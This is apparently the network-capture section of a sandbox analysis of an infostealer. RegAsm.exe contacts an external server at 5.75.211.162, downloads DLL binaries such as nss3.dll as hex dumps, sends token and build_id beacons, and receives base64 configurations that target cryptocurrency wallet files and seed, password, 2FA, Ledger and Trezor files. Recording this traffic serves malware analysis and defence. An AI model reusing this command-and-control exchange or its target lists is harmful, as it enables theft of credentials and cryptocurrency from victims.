2024-09-26 18:14:47 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-26 18:14:47 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-26 18:14:47 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49731	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:48 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:48 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:48 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:14:48 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:14:48 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-26 18:14:48 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-26 18:14:49 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49732	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:51 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:51 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GCGHJEBGHJKEBFHIJDHCCont
2024-09-26 18:14:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49733	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:52 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEGIIJDGHCAKFHJEHCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------AKEGIIJDGHCAKFHJEHCFContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------AKEGIIJDGHCAKFHJEHCFContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------AKEGIIJDGHCAKFHJEHCFCont
2024-09-26 18:14:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:53 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49734	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:54 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------DBKFHCFBGIIJKFHJDHDHCont
2024-09-26 18:14:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:14:54 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49735	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
